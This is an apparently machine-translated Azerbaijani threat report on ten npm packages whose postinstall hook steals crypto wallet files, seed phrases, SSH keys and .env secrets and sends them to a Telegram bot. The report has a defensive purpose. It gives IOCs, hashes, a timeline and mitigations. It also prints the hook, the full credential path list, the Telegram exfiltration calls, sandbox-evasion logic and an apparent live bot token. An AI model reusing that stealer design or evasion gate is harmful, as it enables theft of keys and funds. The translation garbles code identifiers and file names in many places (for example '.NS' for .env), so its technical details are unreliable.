TL; DR
9 iyun 2026-cı ildə tək bir npm naşir hesabı, aicrypto-xzggg, göndərilib on paket kripto və Web3 dadlı adlarla — farming-tools-12, swap-sdk-87, defi-tools-39, wallet-sdk-9və daha altı.
Hər paket eyni yükü birdən işə salır postinstall qarmaq. Quraşdırma zamanı, CI daxilində və ya sandbox daxilində işlədiyini yoxlayır — əgər işləmirsə, cüzdan açar anbarlarını, toxum ifadəsi fayllarını, SSH açarlarını və s. oxuyur. .env altı blokçeyn ekosistemindən faylları yükləyir və onları Telegram botuna ötürür.
Müdafiəçinin dərhal axtara biləcəyi tək göstərici Telegram bot identifikatorudur 8227918239.
Şiddəti: tənqidi — imza açarlarının və bərpa ifadələrinin birbaşa oğurlanması geliştirici iş stansiyaları.
Hücum: Necə İşləyir
Paketlər özlərini blokçeyn geliştirici yardımçı proqramları kimi reklam edirlər. paket.json minimaldır və quraşdırma həyat dövrünü skriptə yönəldir:
{ "name": "farming-tools-12", "main": "src/index.js", "scripts": { "postinstall": "node scripts/postinstall.js" }, "keywords": ["web3", "crypto", "blockchain", "solana", "ethereum"], "author": "Alex Smith", "license": "MIT" } skriptlər/postinstall.js əsl yükü yükləyən tək xətli bir şimdir: tələb edir(“../src/index.js”). Çünki quraşdırma sonrası ərzində avtomatik olaraq işləyir npm yükləyin, geliştirici tərəfindən kod idxalı tələb olunmur — paketi asılılıq ağacına yerləşdirmək onu icra etmək üçün kifayətdir.
İçəridəki öldürücü zənciri src/index.js dörd addımdan ibarətdir:
- Ətraf mühit yoxlaması. Mühafizə funksiyası, hostun quruluş agenti və ya analiz sandboxu kimi göründüyünə qərar verir.
- Gecikmə. İcra təxirə salınıb vaxtaşırı təyin etmək təxminən 7.4 saniyə.
- Kolleksiya. Cüzdan, açar və gizli fayl yollarının sabit siyahısı gəzilir; mövcud fayllar növbəyə düzülür.
- Eksfiltrasiya. Növbədə olan fayllar Telegram botuna göndərilir və bundan əvvəl xülasə mesajı verilir.
Kolleksiya hədəf siyahısı altı zəncir və ümumi geliştirici sirlərini əhatə edir. Kəsilmiş:
~/.config/solana/id.json ~/.ethereum/keystore ~/.solana/keypair.json ~/.bitcoin/wallet.dat ~/.tron_wallet/keystore ~/.sui/sui_config/sui.keystore ~/.aptos/key.txt ~/.ssh/id_rsa , ~/.ssh/id_ed25519 ./wallet.json ./keystore.json ./mnemonic.txt ./seed.txt ./seedphrase.txt ./recovery.txt ./private.key ./.env ./.env.local Cəmi iyirmi bir yol. Kataloq girişləri, məsələn ~/.ethereum/açar mağazası genişləndirilir və içindəki hər bir fayl növbəyə qoyulur. Eksfiltrasiya birbaşa Telegram Bot API-dən istifadə edir — a Mesaj göndər ana və fayl xülasəsi ilə zəng edin, sonra isə Sənəd göndər hər fayl üçün çox hissəli yükləmə:
mətn
POST https://api.telegram.org/bot<token>/sendMessage POST https://api.telegram.org/bot<token>/sendDocument (one per file) Kodun yığdığı xülasə mesajı hərfi sətirlə başlayır KRIPTO OĞURLUĞU, ardınca host adı, istifadəçi adı, mənbə paket adı, fayl sayı və zaman möhürü gəlir.
Burada yeniliklər var
Fərqləndirici oğurluq mexanizmi deyil — npm-dən Telegram əsaslı exfil quraşdırma sonrası hooks yaxşı tapdalanmışdır. Bu icra qapısı. Hər hansı bir hərəkət etməzdən əvvəl, faydalı yük, host CI runner və ya sandbox kimi göründüyü zaman true qaytaran və etdikdə erkən qaytaran bir funksiya çağırır:
mətn
isTestEnvironment() is true when ANY of: - env CI == "true" OR GITHUB_ACTIONS == "true" OR JENKINS_HOME set - env NODE_ENV in {test, development} - username/USER contains: runner, sandbox, test, docker, jenkins, gitlab, travis, circleci - hostname contains: sandbox, test, ci - hostname matches /^[a-f0-9]{12}$/ (a container-id shape) Konteyner id regex-i diqqətəlayiq bənddir: 12 hex simvollu host adı Docker-in təyin etdiyi standart formadır konteyner, beləliklə, faydalı yük "mənim host adım Docker konteynerinə oxşayır" ifadəsini hərəkətsiz qalma səbəbi kimi qəbul edir. Yeddi saniyəlik gecikmə ilə birlikdə dizayn, geliştiricinin real iş stansiyasında işləməyi və avtomatlaşdırılmış analiz kimi görünən hər yerdə səssiz qalmağı üstün tutur. Bu qapı dinamik analiz siqnallarını basdıran və statik exfil axınını əsas məhkumluq sübutu kimi saxlayan şeydir.
İş qrafiki
| Tarix (UTC) | hadisə |
|---|---|
| 2026-06-09 ~02:48 | Klasterdəki ilk paketlər dərc edildikdə işarələndi (crypto-utils-7, ethereum-kit-1, web3-tools-9, solana-core-4, blockchain-helper-0) |
| 2026-06-09 ~03:21–03:25 | Daha yüksək versiyalı üzvlər işarələndi (ethereum-kit-9 1.25.36-da, wallet-sdk-9 3.7.73) |
| 2026-06-09 ~03:58–03:59 | Son üzvlər qeyd edildi (defi-tools-39 4.26.29-da, swap-sdk-87 4.63.78-da, farming-tools-12 4.68.54) |
| 2026-06-09 | Bütün on zərərli maddə zərərli hesab olunur və reyestrdən silinməsi üçün bildirilir |
Bütün on film təxminən yetmiş dəqiqə ərzində üzə çıxdı və bu da bir hesabdan tək bir ssenari ilə nəşr olundu.
Kompromis göstəriciləri
Şəbəkə və davranış göstəriciləri (host defanged):
| Göstərici | Dəyər |
|---|---|
| Exfil son nöqtəsi | api[.]telegram[.]org (Telegram Bot API) |
| Telegram bot identifikatoru | 8227918239 |
| Bot tokeni | 8227918239:AAGEMDrBZluDsBBYPxfSyMuv2l3FY8cZCcs |
| Telegram söhbət identifikatoru | 6433587894 |
| Qarmağı quraşdırın | postinstall → scripts/postinstall.js → src/index.js |
| Marker sətri | CRYPTO STEALER yığılmış xülasə mesajında |
| naşir | aicrypto-xzggg (qeyd olunan elektron poçt vipsyria88@gmail[.]com, təsdiqlənməmiş) |
Hər biri SHA-256 ilə təchiz olunmuş paketlər və versiyalar src/index.js Faydalı yük (faydalı yüklər funksional olaraq eynidir və yalnız daxil edilmiş paket adı etiketində fərqlənir, buna görə də hər heş fərqlidir):
| Paketi | Versiya | src/index.js-in SHA-256-sı |
|---|---|---|
farming-tools-12 | 4.68.54 | b50403be9dd9f94f7af4795c1e346c9d27d5a18041a3044773238c4cdc1f4de4 |
swap-sdk-87 | 4.63.78 | 9d96f8759e8d593b6dd2338aceb08cdb12e9a5613700953e04e66cc8c2e3087c |
defi-tools-39 | 4.26.29 | ddc5011b6173a57bc7f29b010ed6b71551dee253b5d05d3efc78d076f5351fee |
wallet-sdk-9 | 3.7.73 | ef4459281c64f1fe8923d703d416f04080ff1a2b7b385366f46d7cdb25731502 |
ethereum-kit-9 | 1.25.36 | c43afad949027040c6414d26fa4eea6e2671d2572f9df7fd595e12baf204854f |
ethereum-kit-1 | 1.0.0 | 1147f5227f3b13f65a438b31d87766c33affc65b7734a8658c95e0a4be1d2381 |
solana-core-4 | 1.0.0 | 93c65f971137d2753b5c57b685471bf5319bdc357fa863de56cbed8447cf576d |
web3-tools-9 | 1.0.0 | db97070bd349503f5703404493fc925448c2308c86708b33786309ebe6446a3d |
crypto-utils-7 | 1.0.0 | 59f2fb112d6f17102fb4a70c8d12bfcbc93e9f0d170fe4451bad1aa4d5d74c92 |
blockchain-helper-0 | 1.0.0 | 053eb318980439d76eecac9847ae31ecf59654cf75ddcfebbdd9ce64bb98a0db |
Sadə bir axtarış sorğusu: on adın hər hansı biri üçün quraşdırma qeydlərini və kilid fayllarını axtarın və başqa cür istifadə etməyən build və ya geliştirici hostlarından Telegram Bot API-yə bağlantılar üçün çıxış trafikini axtarın.
Atribut və Müşahidə Edilən Davranış
On paketin hamısı bir hesab tərəfindən dərc edilib, aicrypto-xzggg, göstərilən elektron poçt ünvanı vipsyria88@gmail[.]comHəm e-poçt, həm də mənbəyə nəzarət linki reyestr metaməlumatlarında təsdiqlənməyib və hesabın nüfuzu çox mənfidir. Hesabı kimin idarə etdiyini təsdiqləməmişik.
Hər hansı şəxsiyyət iddiasından iki detalı ayırmaq lazımdır. Birincisi, paket.json müəllif sahə oxumaları Alex Smith hər paketdə, faktiki nəşriyyat hesabı isə aicrypto-xzggg; müəllif sahəsi öz-özünə elan edilmiş metaməlumatlardır və müəllifliyi müəyyən etmir. İkincisi, versiya nömrələri çox dəyişir — bəzi üzvlər burada otururlar 1.0.0, digərləri 4.68.54 — bu, real buraxılış tarixçələrini saxlamaq əvəzinə, yeni hazırlanmış paket adları arasında tək bir faydalı yükün təkrar istifadəsi ilə uyğundur.
Davranış klaster üzrə vahiddir: eyni hədəf yolu siyahısı, eyni Telegram bot identifikatoru və çat identifikatoru, eyni mühit qapısı, eyni KRIPTO OĞURLUĞU marker. Bu vahidlik paketlər arasında ən güclü əlaqədir. Bu, eyni operator siqnalıdır, eynilik deyil.
Müdafiəçilər üçün təsir, tendensiyalar və rəhbərlik
Ekspozisiya konkretdir. Bu paketlərdən hər hansı birini proqram təminatı cüzdanı, toxum ifadəsi faylı və ya SSH açarı saxlayan iş stansiyasına quraşdıran bir geliştirici, həmin faylları saniyələr ərzində oxuyub hostdan ötürür. Bərpa ifadələri və imza açarları sessiya tokeninin müddəti bitmir; bir dəfə mnemonic.txt və ya Solana id.json Maşını tərk etdikdə, onun idarə etdiyi vəsaitlər hərəkət etdirilənə qədər risk altında qalır. Eyni qaçış da ələ keçirir .NS müntəzəm olaraq API açarlarını və verilənlər bazası etimadnaməsini daşıyan fayllar.
Bu klasterin arxasında iki trend dayanır. Birincisi, müəyyən bir auditoriyaya - cüzdanları və açarları quraşdırdıqları eyni maşında saxlayan tərtibatçılara müraciət etmək üçün kripto və Web3 temalı adların davamlı istifadəsidir. İkincisi, quraşdırma vaxtı yüklənmələrində sandbox yayınmasının yetkinləşməsidir. CI mühit dəyişənlərini, çalışan istifadəçi adlarını və Docker konteyner id host adı formasını yoxlayan bir qapı, təhlil altında real iş stansiyasından fərqli davranmaq üçün qəsdən edilən bir səydir və sırf dinamik aşkarlama üçün standartları artırır.
Müdafiəçilər üçün:
Varsayılan olaraq skriptlər deaktiv edilmiş şəkildə quraşdırın. npm quraşdırma –ignore-scripts, və ya təyin edin ignore-scripts=true in .npmrc, qarşısını alır quraşdırma sonrası icra; skriptləri yalnız həqiqətən ehtiyac duyduqları xüsusi asılılıqlar üçün aktivləşdirin.
Cüzdanları və imza açarlarını qurma və inkişaf etdirmə maşınlarından kənarda saxlayın. Avadanlıq cüzdanı və ya xüsusi, asılılıqsız imza hostundan istifadə edin.
Müalicə etmək .NS, açar saxlama yerləri və toxum ifadəsi faylları tac daşları kimi. Onlar heç vaxt eyni zamanda bir qovluqda yerləşməməlidirlər. npm yükləyin işləyən ağac.
CI və geliştirici hostlarından Telegram Bot API-yə çıxış bağlantıları axtarın. Əksər qurma mühitləri heç vaxt bunu çağırmır; quraşdırmadan dərhal sonra qəfildən açılan mühit araşdırmağa dəyər.
Asılılıqları bağlayın və nəzərdən keçirin. Ümumi kripto adı olan yeni bir paket, a quraşdırma sonrası hook və heç bir depo bağlantısı kilid faylına daxil olmadan əvvəl baxmağa ehtiyac duymur.
Container-id yayınma bəndi analitiklər üçün də bir xatırlatmadır: sandbox-da hərəkətsiz qalan quraşdırma vaxtı faydalı yükü zərərsiz deyil, seçicidir. Quraşdırma yolunun statik nəzərdən keçirilməsi dinamik icranın nəyi göstərməkdən imtina edə biləcəyini görmək üçün etibarlı bir yol olaraq qalır.
References
npm quraşdırma sənədləri — həyat dövrü skriptləri və –ignore-scripts— avtomatik quraşdırmanı deaktiv etmək üçün istinad hooks.





